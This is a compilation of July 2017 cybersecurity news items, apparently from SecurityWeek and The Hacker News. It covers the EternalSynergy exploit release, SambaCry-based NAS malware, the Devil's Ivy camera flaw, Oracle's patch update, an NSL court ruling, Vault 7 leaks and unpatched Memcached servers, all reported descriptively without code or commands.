Security researcher Worawit Wang has now made public an EternalSynergy-derived exploit that also leverages EternalRomance and can be used on a wider range of Windows versions.

Available on both GitHub and ExploitDB, the tool targets 64-bit versions of Windows 2016, Windows 2012 R2, Windows 8.1, Windows 2008 R2 SP1, and Windows 7 SP1, as well as the 32-bit versions of Windows 8.1 and Windows 7 SP1.

Security researcher Sheila A. Berta, who is part of Telefonica's Eleven Paths security unit, has published a paper (PDF) on how to exploit Wang’s tool to get a Meterpreter session on Windows Server 2016.

EternalSynergy is based on the CVE-2017-0143 vulnerability, which “stems from not taking the command type of an SMB message into account when determining if the message is part of a transaction,” Microsoft reveals. “In other words, as long as the SMB header UID, PID, TID and OtherInfo fields match the corresponding transaction fields, the message would be considered to be part of that transaction.”

According to Microsoft, EternalSynergy should not work on Windows iterations newer than Windows 8, due to kernel security improvements such as Hypervisor-enforced Code Integrity (HVCI), which prevents unsigned kernel pages from being executed, and Control Flow Guard (CFG), designed to prevent invalid indirect function calls.

The exploit is expected to crash on unsupported operating system releases, but Wang managed to create a stable tool that targets Windows XP and newer versions, except Windows 10. Given a patch is already available from Microsoft, impacted users should consider applying it as soon as possible.

EternalSynergy is only one of the NSA-linked exploits to have caught researchers’ attention over the past several months. EternalBlue might be the most discussed such tool, after it has been abused in global attacks by ransomware such as WannaCry, the UIWIX ransomware, Adylkuzz botnet, and a stealth Remote Access Trojan.

Last month’s destructive NotPetya wiper also used EternalBlue to spread within compromised networks, along with the EternalRomance exploit and various other tools.


Malware Targets NAS Devices Via SambaCry Exploit

19.7.2017 securityweek  Virus

A piece of malware dubbed by researchers SHELLBIND leverages a recently patched Samba vulnerability in attacks aimed at Internet of Things (IoT) devices, particularly network-attached storage (NAS) appliances.

The Samba flaw exploited in these attacks, tracked as CVE-2017-7494 and known as SambaCry and EternalRed, can be exploited by a malicious client to upload a shared library to a writable share, and then cause the server to load that library. This allows a remote attacker to execute arbitrary code on the targeted system.

The security hole was introduced in the Samba code in 2010 and it was patched in May. Since the Samba interoperability software suite is highly popular, the vulnerability affects the products of several major vendors, including NAS appliances.

Roughly two weeks after the patch was released, security firms noticed that the vulnerability had been exploited to deliver a cryptocurrency miner.

In early July, researchers at Trend Micro spotted another type of attack involving SambaCry. Cybercriminals have been exploiting the vulnerability in attacks targeting NAS devices used by small and medium-size businesses. The malware they have been using works on various architectures, including MIPS, ARM and PowerPC.

Attackers can leverage the Shodan Internet search engine to identify devices using Samba and write the initial malware files to their public folders.

According to Trend Micro, ELF_SHELLBIND.A is delivered as a SO file to Samba public folders and loaded via the SambaCry vulnerability. Once it’s deployed on the targeted system, the malware contacts a command and control (C&C) server located in East Africa. The threat modifies firewall rules to ensure that it can communicate with its server.

“Once the connection is successfully established and authentication is confirmed, then the attacker will have an open command shell in the infected systems where he can issue any number of system commands and essentially take control of the device,” explained Trend Micro researchers.

Users can protect their systems against these attacks by ensuring that Samba is up to date. Another mitigating factor is the need to have writable access to a shared location on the targeted system.


Court Upholds Gag Orders in National Security Letters

19.7.2017 securityweek  Security

The Ninth U.S. Circuit Court of Appeals in San Francisco confirmed a lower court decision Monday that gag orders included in FBI National Security Letters (NSLs) do not violate the First Amendment of the U.S. Constitution's free speech protections.

It has been a long journey to this decision (PDF) centered around five NSLs; three received by CREDO in 2011 and 2013, and two received by Cloudflare in 2012. The two organizations petitioned the district court to have both the information requests and the non-disclosure requirements of the NSLs set aside.

The district court decided that the 2006 NSL Law was unconstitutional and enjoined the government from issuing new requests and enforcing the gag (but stayed the decision pending a government appeal). It did not set aside the existing five NSLs. CREDO and Cloudflare, and the government, appealed the decision.

With the appeals pending, the government enacted the USA FREEDOM Act, which became effective June 2, 2015. Given the new law, the appeals court sent the matter back to the district court. This time, the lower court decided that the NSL law, as amended, is constitutional, and that the FBI had shown sufficient cause. It allowed the government's cross-petition to enforce the NSLs and gags, barring the two 2013 CREDO NSLs.

CREDO and Cloudflare appealed the decision to uphold three of the NSLs, and the government appealed the decision to set aside the two 2013 CREDO NSLs. Meanwhile, the FBI closed its investigations pertaining to the three remaining NSLs, and voluntarily and partly lifted the gagging orders.

But CREDO and Cloudflare persisted, arguing that the whole concept of gagging NSLs contravenes the constitutional right to free speech.

It is this final petition that was rejected by the appeals court on Monday. Ironically, it is the FREEDOM Act that upholds the decision. The FREEDOM Act enforces greater administrative care over the delivery of NSLs and gag orders -- but if that care is taken, the requests become legal. That, at least, is the decision of the Ninth.

"We conclude," announced the three judges, "that § 2709(c)'s nondisclosure requirement imposes a content-based restriction that is subject to, and withstands, strict scrutiny. We further hold that, assuming the nondisclosure requirement is the type of prior restraint for which the Freedman procedural safeguards are required, the NSL law provides those safeguards. The nondisclosure requirement in the NSL law therefore does not run afoul of the First Amendment.

"It is not yet known whether CREDO and Cloudflare will continue the fight and appeal to the Supreme Court. Electronic Frontier Foundation (EFF) staff attorney Andrew Crocker tweeted, "Disappointing 9th Cir ruling in EFF's national security letter case on behalf of @CREDOMobile @Cloudflare. More soon." He added, "Especially disappointing is the court's failure to address permanent NSL gags, which always violate the First Amendment."

In a statement emailed to SecurityWeek, CREDO CEO Ray Morris said, "We are disappointed in the Ninth Circuit's decision and are considering our options for next steps. At CREDO, we know what an uphill battle challenging these gag orders can be and feel that the court missed an opportunity to protect the First Amendment rights of companies that want to speak out in the future."

Last week, EFF published its 2017 report, Who Has Your Back? It explains the issues behind NSLs. "NSLs are akin to subpoenas requiring service providers -- including technology companies, phone companies, and ISPs -- to hand over data to the FBI about users' private communications and Internet activity. These orders are almost always accompanied by gag orders preventing the recipients from ever revealing the letter's existence and which have contributed to widespread abuse of this investigatory tool."

Although Cloudflare was not included in the EFF study, CREDO is one of just 9 companies out of 26 awarded five stars for its attitudes and attempts to protect user privacy.

"Cloudflare's approach to law enforcement requests is that we are supportive of their work but believe that any requests we receive must adhere to the due process of law and be subject to judicial oversight," Doug Kramer, General Counsel at Cloudflare told SecurityWeek. "It is not Cloudflare's intent to make their job any harder, or easier. In 2013, we challenged an FBI request for customer information on a confidential basis through an NSL, which was not an easy decision, because we felt it violated that principle. Although decisions by a federal court and a new statute since that time have improved the NSL process, we think there is additional work to be done and are disappointed the Ninth Circuit ruled the current practice sufficient."

*Updated with comment from Cloudflare


UK Spy Agency Warns of State-sponsored Hackers Targeting Critical Infrastructure

19.7.2017 securityweek  BigBrothers

The U.K. Government Communications Headquarters (GCHQ), Britain's secret eavesdropping agency, warns that 'a number of [UK] Industrial Control System engineering and services organisations are likely to have been compromised' following the discovery of 'connections from multiple UK IP addresses to infrastructure associated with advanced state-sponsored hostile threat actors.'

The warning comes from a National Cyber Security Centre (NCSC) memo obtained by Motherboard and confirmed by the BBC. NCSC is part of the UK's primary cyber intelligence agency, GCHQ.

From the little information available, it doesn't appear as if there are any specifically known compromises -- NCSC might simply be working from the statistical probability that if enough phishing attacks are launched, at least some will inevitably succeed.

Spear-phishing is not specifically mentioned within the memo, although it does mention a separate, non-public report from the FBI and DHS last month suggesting the same attackers were using spear-phishing to deliver poisoned Word documents. Motherboard also points to a paywalled report in the Times, Saturday, which states, "Hackers backed by the Russian government have attacked energy networks running the national grid in parts of the UK, The Times has learnt."

The clear unproven implication is that Russian state-backed actors are specifically targeting the western energy sector. Having said that, however, the Times report differs from the FBI/DHS and NCSC memos by stating that the intention was "to infiltrate control systems... This would also have given them the power to knock out parts of the grid in Northern Ireland."

Both the FBI/DHS and NCSC memos point to attacks against services organizations, indicating that in the UK and America, it is primarily the supply chain to the critical infrastructure that is being targeted. Indeed, the FBI/DHS statement comments, "There is no indication of a threat to public safety, as any potential impact appears to be limited to administrative and business networks."

So, apart from the Times report, this would appear to be a large-scale campaign designed to find ways to infiltrate the critical infrastructure rather than anything designed to damage the critical infrastructure. This is probably standard practice for most cyber-advanced nations -- ensuring they have the capacity to respond to a potential enemy if it ever becomes necessary.

The importance to an enemy and the potential danger to the critical infrastructure should not, however, be underestimated. A known and ready access route into, for example, the power grid, would be similar to having a nuclear deterrent primed and ready -- there is no intention to use it, but accidents can happen.

Neither the FBI/DHS nor the NCSC names the attackers. The NSCS clearly has suspects since it recognizes the infrastructure used. The New York Times, however, implicates Russia. "Two people familiar with the investigation say that, while it is still in its early stages, the hackers' techniques mimicked those of the organization known to cybersecurity specialists as "Energetic Bear," the Russian hacking group that researchers have tied to attacks on the energy sector since at least 2012."


Rapid7 Acquires Security Orchestration and Automation Firm Komand

19.7.2017 securityweek  Security

Boston-based IT security and operations software maker Rapid7 (NASDAQ: RPD) on Tuesday announced that it has acquired security orchestration and automation firm Komand.

Founded in late 2015 by Jen Andre, who previously co-founded Threat Stack, Komand’s platform was designed to help security and IT teams automate repetitive tasks, which Rapid7 says will “help its customers reduce time to resolution, maximize resources, and overcome ecosystem complexity.”

Specifically, Rapid7 explained that Komand’s technology will expand Rapid7’s Insight platform’s ability to “empower lean security and IT teams to meaningfully increase productivity across their entire operation and reduce the time it takes to respond to an incident.”

Customers will now have the ability to automatically identify risks, respond to incidents, and address issues significantly faster and with less human intervention, Rapid7 says.

“The need for well-designed security and IT automation solutions is acute; resources are scarce, environments are becoming more complex, all while threats are increasing,” said Corey Thomas, president and CEO of Rapid7. “Security and IT solutions must evolve through context-driven automation, allowing cybersecurity and IT professionals to focus on more strategic activities.”

“We’ve been impressed by the technology developed by the Komand team and believe that together, we’ll be able to build solutions that make security and IT teams significantly more productive,” said Lee Weiner, chief product officer at Rapid7. “The complexity of today’s security and IT ecosystems have put security and IT operations teams at a significant disadvantage when they need to respond quickly. By developing contextualized automation technology, we’ll be able to cut back the time it takes to respond to an incident—when minutes can mean the difference between a minor issue and significant compromise or loss.”

Rapid7 cites use cases including automated risk remediation and patching, malware investigation and containment, and chat ops for responding to routine inquiries.

The terms of the acquisition were not disclosed, though Rapid7 said the purchase is not expected to have a material financial impact to its calculated billings, revenue, and non-GAAP earnings (loss) per share for calendar year 2017, as guided on May 9, 2017.

Both Rapid7 and Komand were Boston-based companies with offices just down the street from each other.

Komand announced in Jan. 2017 that it had closed a $1.25 million seed round of funding.

As part of the acquisition, 12 Komand employees have become employees of Rapid7.


Millions of IoT Devices Possibly Affected by 'Devil's Ivy' Flaw

19.7.2017 securityweek  Vulnerebility

A vulnerability dubbed by researchers “Devil’s Ivy,” which exists in an open source library present in the products of many companies, could affect millions of security cameras and other Internet of Things (IoT) devices.

The flaw, a stack-based buffer overflow, was discovered by IoT security startup Senrio in a camera from Axis Communications, one of the world’s largest security camera manufacturers.

The weakness, tracked as CVE-2017-9765, can be exploited to cause a denial-of-service (DoS) condition and to execute arbitrary code. Senrio has published a technical advisory and a video showing how an attacker could exploit the flaw to hijack a security camera and gain access to its video feed.

“When exploited, [the vulnerability] allows an attacker to remotely access a video feed or deny the owner access to the feed,” Senrio said in a blog post. “Since these cameras are meant to secure something, like a bank lobby, this could lead to collection of sensitive information or prevent a crime from being observed or recorded.”
Devil's Ivy Exploit in Axis Security Camera from Senrio Labs on Vimeo.

Axis has determined that the vulnerability impacts nearly 250 of its camera models and it has started releasing firmware updates that patch the bug. The company has notified its customers and partners of Devil’s Ivy.

An investigation revealed that the security hole was actually in gSOAP, a development toolkit that simplifies the use of XML in server and client web applications. gSOAP is used by most of the top Fortune 500 companies and its developer, Genivia, claims it has been downloaded more than one million times.

The library is also used by some members of the ONVIF Forum, an organization that focuses on standardizing IP connectivity for cameras and other physical security products. ONVIF was established by Axis, Bosch and Sony in 2008 and its current members also include Canon, Cisco, D-Link, Honeywell, Huawei, Netgear, Panasonic, Siemens and Toshiba.

Senrio believes the Devil’s Ivy vulnerability could affect tens of millions of systems to some degree. A Shodan search conducted by the company on July 1 uncovered nearly 15,000 Axis dome cameras accessible from the Internet.

However, Genivia, which provided patches and mitigations, believes the vulnerability is not easy to exploit for arbitrary code execution.

Axis also pointed out in its advisory that exploitation of the flaw for code execution requires a skilled and determined attacker. The hacker needs to have access to the network housing the vulnerable device, but products exposed to the Internet are at much higher risk.

Both Axis and Senrio have advised users to place their cameras and other IoT devices behind a firewall to reduce the risk of exploitation.


Oracle Patches Record-Breaking 308 Vulnerabilities in July Update

19.7.2017 securityweek  Vulnerebility

Oracle on Tuesday released its July 2017 Critical Patch Update (CPU) to address a total of 308 vulnerabilities, the highest number of security fixes ever released in a quarter by the enterprise software giant.

This month’s CPU resolves security issues in 22 different Oracle products, including Oracle Database Server, Oracle Enterprise Manager, Oracle Fusion Middleware, Oracle Hyperion, Oracle E-Business Suite, Oracle Industry Applications (Communications, Retail, and Hospitality), Oracle Primavera, Oracle Sun Products, Oracle Java SE, and Oracle MySQL.

Of the total 308 vulnerabilities addressed, 27 were assessed as critical issues, with a CVSS base score between 9.0 and 10.0 (only one bug was rated 10). Over half of the vulnerabilities addressed this month can be exploited remotely without authentication.

Oracle Hospitality Applications received the largest number of security fixes, at 48 – 11 of these may be remotely exploitable without authentication. Oracle Fusion Middleware received 44 fixes (31 remotely exploitable without authentication), including one that addressed a critical vulnerability (CVE-2017-10137 – CVSS score 10.0) in Oracle WebLogic Server.

Oracle also resolved large numbers of vulnerabilities in Oracle Java SE (32 – 28 remotely exploitable without authentication), Oracle PeopleSoft Products (30 – 20 remotely exploitable), Oracle MySQL (30 – 9 remotely exploitable), Oracle E-Business Suite (22 – 18 remotely exploitable), and Oracle Financial Services Applications (20 – 4 remotely exploitable).

The record-breaking number of 30 flaws addressed in PeopleSoft is worrying, especially since 20 of the bugs can be exploited over the network without user credentials, ERPScan, a firm that specializes in security SAP and Oracle software, notes.

“Oracle PeopleSoft combines Supplier Relationship Management, Human Capital Management, Supply Chain Management, and other applications. The software has 6000+ enterprise customers and serves 20 million end users worldwide including more than 800 universities. Over 1000 PeopleSoft systems are available on the Internet putting organizations at risk. According to the latest survey from Crowd Research partners, 89% of responders agreed that the number cyber-attacks on ERP will significantly grow in the near future. SAP Attacks may cost up to $50 million, PeopleSoft is definitely the same weight category,” Alexander Polyakov, CTO at ERPScan, told SecurityWeek in an emailed statement.

82 of the vulnerabilities addressed in this quarter’s CPU affect a scope of crucial business applications from Oracle, such as Oracle PeopleSoft, E-Business Suite, Siebel CRM, Oracle Financial Services, and Oracle Primavera Products Suite. Around 53% of these bugs can be exploited remotely without authentication.

One of the most important vulnerabilities in E-Business Suite (CVE-2017-10244) is an Information Disclosure issue that could allow an attacker “to exfiltrate sensitive business data without requiring a valid user account in the system,” Onapsis, the company that discovered the issue, reveals. The flaw affects all supported Oracle E-Business Suite versions: 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6.

“This vulnerability is especially critical as an attacker would only need a web browser and network access to the EBS system to perform it. Any number of critical documents could be stored in the system including invoices, purchase orders, HR information and design documents to start. Even systems in DMZ mode do not ensure these systems are not vulnerable,” Juan Perez-Etchegoyen, Onapsis CTO, said.

Other Oracle E-Business Suite flaws addressed this month include a path traversal vulnerability (CVE-2017-10192), multiple vulnerabilities that allow path traversal attacks (grouped in CVSs CVE-2017-10184 and CVE-2017-10186), two Denial of Service vulnerabilities (CVE-2017-10108 and CVE-2017-10109), a Multiple Cross Site Scripting vulnerability (CVE-2017-10180), two Cross Site Scripting vulnerabilities (CVE-2017-10185 and CVE-2017-10191) and an Information disclosure vulnerability (CVE-2017-10245).

“There are different vulnerabilities which could be used by an attacker to compromise the system and get business critical information. It is crucial to update Oracle E-Business Suite with the last patch to fix all of these vulnerabilities and have the system up to date,” Onapsis says.

The most critical issues resolved in the Oracle July 2017 CPU affect Oracle WebLogic Server component of Oracle Fusion Middleware (CVE-2017-10137 – CVSS score 10.0), the OJVM component of Oracle Database Server (CVE-2017-10202 – CVSS score 9.9), the Oracle Communications BRM component of Oracle Communications Applications (CVE-2015-3253 – CVSS score 9.8), the MICROS PC Workstation 2015 component of Oracle Hospitality Applications (CVE-2017-5689 – CVSS score 9.8), and the MySQL Enterprise Monitor component of Oracle MySQL (CVE-2016-4436 – CVSS score 9.8).

Each quarter starting last year, Oracle has been patching an increasing number of vulnerabilities in its products. After the January 2016 CPU broke the 200 security patches barrier, the April 2017 one hit the 300 mark, and this month’s set of patches sets a new record.

As more and more security researchers focus on finding vulnerabilities in business software, the number of addressed issues is expected to increase. This should result in improved overall security for Oracle software, but only as long as patches are installed in a timely manner, which is a difficult and monotonous task, as ERPScan points out.


Mozilla Conducts Security Audit of Firefox Accounts

19.7.2017 securityweek  Security

Mozilla has asked Germany-based security firm Cure53 to conduct an audit of the Firefox Accounts system and researchers identified a total of 15 issues, including vulnerabilities rated critical and high severity.

Firefox Accounts, also known as FxA, is the system that allows Firefox users to access hosted services provided by Mozilla. Since the component represents Firefox’s central authentication service and it’s likely to be targeted by malicious actors, Mozilla has decided to have it tested.

Tests conducted by Cure53 researchers over a 30-day period in September and October 2016 led to the discovery of 15 issues, which includes six vulnerabilities and nine general weaknesses.

The most serious of the flaws, rated critical, could have allowed hackers to launch cross-site scripting (XSS) and scriptless attacks in an effort to phish users or to steal sensitive information. However, Mozilla pointed out that exploitation of the flaw required registering a relier, a process that is not open to the public.

One of the high severity vulnerabilities found by Cure53 could have allowed arbitrary command execution if the attacker could determine the location for the execution of an application.

The list of high severity flaws also includes another XSS bug and an encryption weakness that may be exploited to increase the efficiency of brute-force attacks. The other problems identified by researchers have been classified as having low or medium severity.

Most of the vulnerabilities have been patched and Mozilla claimed that none of them had been exploited for malicious purposes and none of them put user data at risk.

“Given the amount of the audited code and the complexity of the project, this number of findings classifies as low and translates to an overall positive result of the investigation,” Cure53 said in its report. “Despite the fact that the tests were as thorough as possible on the codebase placed in scope, only a single ‘Critical’ finding was ultimately spotted. Even though this issue was discovered early on in the test, no major design issues were identified. Ultimately, the platform was perceived as rather robust and secured against a wide range of different attacks.”

In the past months, Mozilla commissioned audits for several pieces of software through its Secure Open Source (SOS) program, including for cURL, Dovecot and the Network Time Protocol (NTP).


2017 ICS Cyber Security Conference Call for Speakers Open Through August 15

19.7.2017 securityweek  ICS

Longest Running ICS/SCADA Cybersecurity Conference to take Place Oct. 23-26, 2017 at InterContinental Hotel Atlanta

The official Call for Papers (speakers) for SecurityWeek’s 2017 Industrial Control Systems (ICS) Cyber Security Conference, being held October 23 – 26, 2017 at the InterContinental Buckhead Atlanta, Georgia, USA is open through August 15, 2017.
As the original ICS/SCADA cyber security conference, the event is the largest and longest-running cyber security-focused event series for the industrial control systems sector. The conference caters to the energy, water, utility, chemical, transportation, manufacturing, and other industrial and critical infrastructure organizations.

2017 ICS Cyber Security Conference

With a 15-year history, the conference has proven to bring value to attendees through the robust exchange of technical information, actual incidents, insights, and best practices to help protect critical infrastructures from cyber-attacks.

Produced by SecurityWeek, the conference addresses ICS/SCADA topics including protection for SCADA systems, plant control systems, engineering workstations, substation equipment, programmable logic controllers (PLCs), and other field control system devices.

The Conference is unique and has historically focused on control system end-users from various industries and what cyber vulnerabilities mean to control system reliability and safe operation. It also has a long history of having discussions of actual ICS cyber incidents along with lessons learned.

The 2017 Conference is expected to attract more than 450 professionals from around the world, including large critical infrastructure and industrial organizations, military and state and Federal Government. The incorporates training workshops and advanced full-day training sessions on various topics.

Through the Call for Speakers, a conference committee will accept speaker submissions for possible inclusion in the program at the 2017 ICS Cyber Security Conference.

The conference committee encourages proposals for both main track and “In Focus” sessions. Most sessions are 45 minutes in length including time for Q&A.

Submissions will be reviewed on an ongoing basis so early submission is highly encouraged.

Submissions must include proposed presentation title, an informative session abstract, including learning objectives for attendees if relevant; and contact information and bio for the proposed speaker.

All speakers must adhere to the 100% vendor neutral / no commercial policy of the conference. If speakers cannot respect this policy, they should not submit a proposal.

To be considered, interested speakers should submit proposals by email to events@securityweek.com with the subject line “ICS2017 CFP” by August 15, 2017.

Plan on Attending the 2017 ICS Cyber Security Conference?

Online registration is open, with discounts available for early registration.

Sponsorship Opportunities

Sponsorship and exhibitor opportunities for the 2017 ICS Cyber Security Conference are available. Please contact events(at)securityweek.com for information.

About the ICS Cyber Security conference

Produced by SecurityWeek, the ICS Cyber Security Conference is the conference where ICS users, ICS vendors, system security providers and government representatives meet to discuss the latest cyber-incidents, analyze their causes and cooperate on solutions. Since its first edition in 2002, the conference has attracted a continually rising interest as both the stakes of critical infrastructure protection and the distinctiveness of securing ICSs become increasingly apparent.


WikiLeaks Reveals CIA Teams Up With Tech to Collect Ideas For Malware Development
19.7.2017 thehackernews BigBrothers
As part of its ongoing Vault 7 leaks, the whistleblower organisation WikiLeaks today revealed about a CIA contractor responsible for analysing advanced malware and hacking techniques being used in the wild by cyber criminals.
According to the documents leaked by WikiLeaks, Raytheon Blackbird Technologies, the Central Intelligence Agency (CIA) contractor, submitted nearly five such reports to CIA as part of UMBRAGE Component Library (UCL) project between November 2014 and September 2015.
These reports contain brief analysis about proof-of-concept ideas and malware attack vectors — publically presented by security researchers and secretly developed by cyber espionage hacking groups.
Reports submitted by Raytheon were allegedly helping CIA's Remote Development Branch (RDB) to collect ideas for developing their own advanced malware projects.
It was also revealed in previous Vault 7 leaks that CIA's UMBRAGE malware development teams also borrow codes from publicly available malware samples to built its own spyware tools.
Here's the list and brief information of each report:
Report 1 — Raytheon analysts detailed a variant of the HTTPBrowser Remote Access Tool (RAT), which was probably developed in 2015.
The RAT, which is designed to capture keystrokes from the targeted systems, was being used by a Chinese cyber espionage APT group called 'Emissary Panda.'
Report 2 — This document details a variant of the NfLog Remote Access Tool (RAT), also known as IsSpace, which was being used by Samurai Panda, Identified as another Chinese hacking group.
Equipped with Adobe Flash zero-day exploit CVE-2015-5122 (leaked in Hacking Team dump) and UAC bypass technique, this malware was also able to sniff or enumerate proxy credentials to bypass Windows Firewall.
Report 3 — This report contains details about "Regin" -- a very sophisticated malware sample that has been spotted in operation since 2013 and majorly designed for surveillance and data collection.
Regin is a cyber espionage tool, which is said to be more sophisticated than both Stuxnet and Duqu and is believed to be developed by the US intelligence agency NSA.
The malware uses a modular approach that allowed an operator to enable a customised spying. Regin's design makes the malware highly suited for persistent, long-term mass surveillance operations against targets.
Report 4 — It details a suspected Russian State-sponsored malware sample called "HammerToss," which was discovered in early 2015 and suspected of being operational since late 2014.
What makes HammerToss interesting is its architecture, which leverages Twitter accounts, GitHub accounts, compromised websites, and Cloud-storage to orchestrate command-and-control functions to execute the commands on the targeted systems.
Report 5 — This document details the self-code injection and API hooking methods of information stealing Trojan called "Gamker."
Gamker uses simple decryption, then drops a copy of itself using a random filename and injects itself into a different process. The trojan also exhibits other typical trojan behaviours.
Previous Vault 7 CIA Leaks
Last week, WikiLeaks revealed CIAs Highrise Project that allowed the spying agency to stealthy collect and forwards stolen data from compromised smartphones to its server through SMS messages.
Since March, the whistle-blowing group has published 17 batches of "Vault 7" series, which includes the latest and last week leaks, along with the following batches:
BothanSpy and Gyrfalcon — two alleged CIA implants that allowed the spying agency to intercept and exfiltrate SSH credentials from targeted Windows and Linux operating systems using different attack vectors.
OutlawCountry – An alleged CIA project that allowed it to hack and remotely spy on computers running the Linux operating systems.
ELSA – the alleged CIA malware that tracks geo-location of targeted PCs and laptops running the Microsoft Windows operating system.
Brutal Kangaroo – A tool suite for Microsoft Windows used by the agency to targets closed networks or air-gapped computers within an organisation or enterprise without requiring any direct access.
Cherry Blossom – An agency's framework, basically a remotely controllable firmware-based implant, used for monitoring the Internet activity of the targeted systems by exploiting vulnerabilities in Wi-Fi devices.
Pandemic – A CIA's project that allowed the agency to turn Windows file servers into covert attack machines that can silently infect other computers of interest inside a targeted network.
Athena – A CIA's spyware framework that has been designed to take full control over the infected Windows PCs remotely, and works against every version of Microsoft's Windows operating systems, from Windows XP to Windows 10.
AfterMidnight and Assassin – Two alleged CIA malware frameworks for the Microsoft Windows platform that has been designed to monitor and report back actions on the infected remote host computer and execute malicious actions.
Archimedes – Man-in-the-middle (MitM) attack tool allegedly created by the CIA to target computers inside a Local Area Network (LAN).
Scribbles – A piece of software allegedly designed to embed 'web beacons' into confidential documents, allowing the spying agency to track insiders and whistleblowers.
Grasshopper – Framework that allowed the spying agency to easily create custom malware for breaking into Microsoft's Windows and bypassing antivirus protection.
Marble – Source code of a secret anti-forensic framework, basically an obfuscator or a packer used by the CIA to hide the actual source of its malware.
Dark Matter – Hacking exploits the agency designed to target iPhones and Macs.
Weeping Angel – Spying tool used by the agency to infiltrate smart TV's, transforming them into covert microphones.
Year Zero – Alleged CIA hacking exploits for popular hardware and software.


Over 70,000 Memcached Servers Still Vulnerable to Remote Hacking
19.7.2017 thehackernews
Vulnerebility
Nothing in this world is fully secure, from our borders to cyberspace. I know vulnerabilities are bad, but the worst part comes in when people just don't care to apply patches on time.
Late last year, Cisco's Talos intelligence and research group discovered three critical remote code execution (RCE) vulnerabilities in Memcached that exposed major websites including Facebook, Twitter, YouTube, Reddit, to hackers.
Memcached is a popular open-source and easily deployable distributed caching system that allows objects to be stored in memory.
The Memcached application has been designed to speed up dynamic web applications (for example php-based websites) by reducing stress on the database that helps administrators to increase performance and scale web applications.
It's been almost eight months since the Memcached developers have released patches for three critical RCE vulnerabilities (CVE-2016-8704, CVE-2016-8705 and CVE-2016-8706) but tens of thousands of servers running Memcached application are still vulnerable, allowing attackers to steal sensitive data remotely.
Researchers at Talos conducted Internet scans on two different occasions, one in late February and another in July, to find out how many servers are still running the vulnerable version of the Memcached application.
And the results are surprising...
Results from February Scan:
Total servers exposed on the Internet — 107,786
Servers still vulnerable — 85,121
Servers still vulnerable but require authentication — 23,707
And the top 5 countries with most vulnerable servers are the United States, followed by China, United Kingdom, France and Germany.
Results from July Scan:
Total servers exposed on the Internet — 106,001
servers still vulnerable — 73,403
Servers still vulnerable but require authentication — 18,012
After comparing results from both the Internet scans, researchers learned that only 2,958 servers found vulnerable in February scan had been patched before July scan, while the remaining are still left vulnerable to the remote hack.
Data Breach & Ransom Threats
This ignorance by organisations to apply patches on time is concerning, as Talos researchers warned that these vulnerable Memcached installations could be an easy target of ransomware attacks similar to the one that hit MongoDB databases in late December.
Although unlike MongoDB, Memcached is not a database, it "can still contain sensitive information and disruption in the service availability would certainly lead to further disruptions on dependent services."
The flaws in Memcached could allow hackers to replace cached content with their malicious one to deface the website, serve phishing pages, ransom threats, and malicious links to hijack victim's machine, placing hundreds of millions of online users at risk.
"With the recent spate of worm attacks leveraging vulnerabilities this should be a red flag for administrators around the world," the researchers concluded.
"If left unaddressed the vulnerabilities could be leveraged to impact organisations globally and affect business severely. It is highly recommended that these systems be patched immediately to help mitigate the risk to organisations."
Customers and organisations are advised to apply the patch as soon as possible even to Memcached deployments in "trusted" environments, as attackers with existing access could target vulnerable servers to move laterally within those networks.


Remotely Exploitable Flaw Puts Millions of Internet-Connected Devices at Risk
19.7.2017 thehackernews
Vulnerebility
Security researchers have discovered a critical remotely exploitable vulnerability in an open-source software development library used by major manufacturers of the Internet-of-Thing devices that eventually left millions of devices vulnerable to hacking.
The vulnerability (CVE-2017-9765), discovered by researchers at the IoT-focused security firm Senrio, resides in the software development library called gSOAP toolkit (Simple Object Access Protocol) — an advanced C/C++ auto-coding tool for developing XML Web services and XML application.
Dubbed "Devil's Ivy," the stack buffer overflow vulnerability allows a remote attacker to crash the SOAP WebServices daemon and could be exploited to execute arbitrary code on the vulnerable devices.

The Devil's Ivy vulnerability was discovered by researchers while analysing an Internet-connected security camera manufactured by Axis Communications.
"When exploited, it allows an attacker to remotely access a video feed or deny the owner access to the feed," researchers say.
"Since these cameras are meant to secure something, like a bank lobby, this could lead to collection of sensitive information or prevent a crime from being observed or recorded."
Axis confirmed the vulnerability that exists in almost all of its 250 camera models (you can find the complete list of affected camera models here) and has quickly released patched firmware updates on July 6th to address the vulnerability, prompting partners and customers to upgrade as soon as possible.
However, researchers believe that their exploit would work on internet-connected devices from other vendors as well, as the affected software is used by Canon, Siemens, Cisco, Hitachi, and many others.
Axis immediately informed Genivia, the company that maintains gSOAP, about the vulnerability and Genivia released a patch on June 21, 2017.
The company also reached out to electronics industry consortium ONVIF to ensure all of its members, including Canon, Cisco, and Siemens, those who make use of gSOAP become aware of the issue and can develop patches to fix the security hole.
Internet of Things (IoT) devices has always been the weakest link and, therefore, an easy entry for hackers to get into secured networks. So it is always advisable to keep your Internet-connected devices updated and away from the public Internet.


New Linux Malware Exploits SambaCry Flaw to Silently Backdoor NAS Devices
19.7.2017 thehackernews
Vulnerebility
Remember SambaCry?
Almost two months ago, we reported about a 7-year-old critical remote code execution vulnerability in Samba networking software, allowing a hacker to remotely take full control of a vulnerable Linux and Unix machines.
We dubbed the vulnerability as SambaCry, because of its similarities to the Windows SMB vulnerability exploited by the WannaCry ransomware that wreaked havoc across the world over two months ago.
Despite being patched in late May, the vulnerability is currently being leveraged by a new piece of malware to target the Internet of Things (IoT) devices, particularly Network Attached Storage (NAS) appliances, researchers at Trend Micro warned.
For those unfamiliar: Samba is open-source software (re-implementation of SMB/CIFS networking protocol), which offers Linux/Unix servers with Windows-based file and print services and runs on the majority of operating systems, including Linux, UNIX, IBM System 390, and OpenVMS.
Shortly after the public revelation of its existence, the SambaCry vulnerability (CVE-2017-7494) was exploited mostly to install cryptocurrency mining software—"CPUminer" that mines "Monero" digital currency—on Linux systems.
However, the latest malware campaign involving SambaCry spotted by researchers at Trend Micro in July mostly targets NAS devices used by small and medium-size businesses.
SHELLBIND Malware Exploits SambaCry to Targets NAS Devices
Dubbed SHELLBIND, the malware works on various architectures, including MIPS, ARM and PowerPC, and is delivered as a shared object (.SO) file to Samba public folders and loaded via the SambaCry vulnerability.
Once deployed on the targeted machine, the malware establishes communication with the attackers' command and control (C&C) server located in East Africa, and modifies firewall rules to ensure that it can communicate with its server.
After successfully establishing a connection, the malware grants the attackers access to the infected device and provides them with an open command shell in the device, so that they can issue any number and type of system commands and eventually take control of the device.
In order to find the affected devices that use Samba, attackers can leverage the Shodan search engine and write the original malware files to their public folders.
